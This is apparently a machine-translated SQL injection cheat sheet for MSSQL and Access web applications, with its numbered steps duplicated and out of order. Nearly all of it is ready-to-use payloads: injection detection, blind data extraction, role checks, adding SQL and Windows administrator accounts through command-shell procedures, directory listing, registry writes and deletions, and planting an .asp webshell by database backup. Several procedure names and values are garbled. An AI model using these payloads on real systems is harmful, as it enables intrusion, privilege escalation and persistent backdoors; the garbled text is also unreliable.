1. Determine whether injection exists; and 1 = 1; and 1 = 2 2. Determine whether it is MSSQL. and user> 0 3. The injection parameter is the character 'and [query condition] And ''=' 4. The 'and [query condition] And' % 25' = 'parameters are not filtered during search' 5. Determine the Database System ; And (select count (*) from sysobjects)> 0 MSSQL ; And (select count (*) from msysobjects)> 0 access 6. Guess the database; and (select count (*) from [database name])> 0 7. Guess the field; and (select count (field name) from database name)> 0 1. Determine whether injection exists; and 1 = 1; and 1 = 2 2. Determine whether it is MSSQL. and user> 0 3. The injection parameter is the character 'and [query condition] And ''=' 4. The 'and [query condition] And' % 25' = 'parameters are not filtered during search' 5. Determine the Database System ; And (select count (*) from sysobjects)> 0 MSSQL ; And (select count (*) from msysobjects)> 0 access 6. Guess the database; and (select count (*) from [database name])> 0 7. Guess the field; and (select count (field name) from database name)> 0 8. Length of records in the guess field; and (select top 1 Len (field name) from database name)> 0 9. (1) obtain the ASCII value of a field (ACCESS) ; And (select top 1 ASC (mid (field name, 1, 1) from database name)> 0 (2) Guess the ASCII value of a field (MSSQL) ; And (select top 1 Unicode (substring (field name, 1, 1) from database name)> 0 10. Test the permission structure (MSSQL) ; And 1 = (select is_srvrolemember ('sysadmin '));-- ; And 1 = (select is_srvrolemember ('serveradmin '));-- ; And 1 = (select is_srvrolemember ('setupadmin '));-- ; And 1 = (select is_srvrolemember ('securityadmin '));-- ; And 1 = (select is_srvrolemember ('diskadmin '));-- ; And 1 = (select is_srvrolemember ('bulkadmin '));-- ; And 1 = (select is_member ('db _ owner '));-- 11. add MSSQL and system accounts ; Exec master. DBO. sp_addlogin username ;-- ; Exec master. DBO. sp_password null, username, password ;-- ; Exec master. DBO. SP_ADDSRVROLEMEMBER SysAdmin username ;-- ; Exec master. DBO. xp_mongoshell 'net User Username Password /Workstations: */times: All/passwordchg: yes/passwordreq: yes/active: yes/add ';-- ; Exec master. DBO. xp_mongoshell 'net User Username Password/add ';-- ; Exec master. DBO. xp_mongoshell 'net localgroup administrators username/add ';-- 12. (1) traverse the directory ; Create Table dirs (paths varchar (100), Id INT) ; Insert dirs exec master. DBO. xp_dirtree 'C :/' ; And (select top 1 paths from dirs)> 0 ; And (select top 1 paths from dirs where paths not in ('obtained paths ')>) (2) traverse directories ; Create Table temp (ID nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));-- ; Insert temp exec master. DBO. xp_availablemedia; -- get all current drives ; Insert into temp (ID) exec master. DBO. xp_subdirs 'C:/'; -- get the subdirectory list ; Insert into temp (ID, num1) exec master. DBO. xp_dirtree 'C:/'; -- get the directory tree structure of all subdirectories ; Insert into temp (ID) exec master. DBO. xp_shareshell 'Type C:/web/index. asp '; -- view the File Content 13. MSSQL Stored Procedures Xp_regenumvalues registry Root Key, subkey ; Exec xp_regenumvalues 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/CurrentVersion/run' returns all key values in multiple Record Sets Xp_regread Root Key, subkey, key value name ; Exec xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'commonfilesdir', return the value of the specified key. Xp_regwrite Root Key, subkey, Value Name, value type, Value There are two value types: REG_SZ and REG_DWORD. ; Exec xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'testvaluename', 'reg _ SZ ', 'Hello' write to the Registry Xp_regdeletevalue Root Key, subkey, Value Name Exec xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'testvaluename' delete a value Xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/CurrentVersion/testkey' delete key, including all values under this key 14. MSSQL backup creates webshell Use Model Create Table cmd (STR image ); Insert into cmd (STR) values (''); Backup database model to disk = 'C:/L. asp '; 15. MSSQL built-in functions ; And (select @ version)> 0 to get the Windows version number ; And user_name () = 'dbo' determine whether the user connected to the current system is sa ; And (select user_name ()> 0 blow the user connected to the current system ; And (select db_name ()> 0 to get the database currently connected 16. Simple webshell Use Model Create Table cmd (STR image ); Insert into cmd (STR) values (''); Backup database model to disk = 'G:/wwwtest/L. asp '; 8. Length of records in the guess field; and (select top 1 Len (field name) from database name)> 0 9. (1) obtain the ASCII value of a field (ACCESS) ; And (select top 1 ASC (mid (field name, 1, 1) from database name)> 0 (2) Guess the ASCII value of a field (MSSQL) ; And (select top 1 Unicode (substring (field name, 1, 1) from database name)> 0 10. Test the permission structure (MSSQL) ; And 1 = (select is_srvrolemember ('sysadmin '));-- ; And 1 = (select is_srvrolemember ('serveradmin '));-- ; And 1 = (select is_srvrolemember ('setupadmin '));-- ; And 1 = (select is_srvrolemember ('securityadmin '));-- ; And 1 = (select is_srvrolemember ('diskadmin '));-- ; And 1 = (select is_srvrolemember ('bulkadmin '));-- ; And 1 = (select is_member ('db _ owner '));-- 11. add MSSQL and system accounts ; Exec master. DBO. sp_addlogin username ;-- ; Exec master. DBO. sp_password null, username, password ;-- ; Exec master. DBO. SP_ADDSRVROLEMEMBER SysAdmin username ;-- ; Exec master. DBO. xp_mongoshell 'net User Username Password /Workstations: */times: All/passwordchg: yes/passwordreq: yes/active: yes/add ';-- ; Exec master. DBO. xp_mongoshell 'net User Username Password/add ';-- ; Exec master. DBO. xp_mongoshell 'net localgroup administrators username/add ';-- 12. (1) traverse the directory ; Create Table dirs (paths varchar (100), Id INT) ; Insert dirs exec master. DBO. xp_dirtree 'C :/' ; And (select top 1 paths from dirs)> 0 ; And (select top 1 paths from dirs where paths not in ('obtained paths ')>) (2) traverse directories ; Create Table temp (ID nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));-- ; Insert temp exec master. DBO. xp_availablemedia; -- get all current drives ; Insert into temp (ID) exec master. DBO. xp_subdirs 'C:/'; -- get the subdirectory list ; Insert into temp (ID, num1) exec master. DBO. xp_dirtree 'C:/'; -- get the directory tree structure of all subdirectories ; Insert into temp (ID) exec master. DBO. xp_shareshell 'Type C:/web/index. asp '; -- view the File Content 13. MSSQL Stored Procedures Xp_regenumvalues registry Root Key, subkey ; Exec xp_regenumvalues 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/CurrentVersion/run' returns all key values in multiple Record Sets Xp_regread Root Key, subkey, key value name ; Exec xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'commonfilesdir', return the value of the specified key. Xp_regwrite Root Key, subkey, Value Name, value type, Value There are two value types: REG_SZ and REG_DWORD. ; Exec xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'testvaluename', 'reg _ SZ ', 'Hello' write to the Registry Xp_regdeletevalue Root Key, subkey, Value Name Exec xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'testvaluename' delete a value Xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/CurrentVersion/testkey' delete key, including all values under this key 14. MSSQL backup creates webshell Use Model Create Table cmd (STR image ); Insert into cmd (STR) values (''); Backup database model to disk = 'C:/L. asp '; 15. MSSQL built-in functions ; And (select @ version)> 0 to get the Windows version number ; And user_name () = 'dbo' determine whether the user connected to the current system is sa ; And (select user_name ()> 0 blow the user connected to the current system ; And (select db_name ()> 0 to get the database currently connected 16. Simple webshell Use Model Create Table cmd (STR image ); Insert into cmd (STR) values (''); Backup database model to disk = 'G:/wwwtest/L. asp ';
|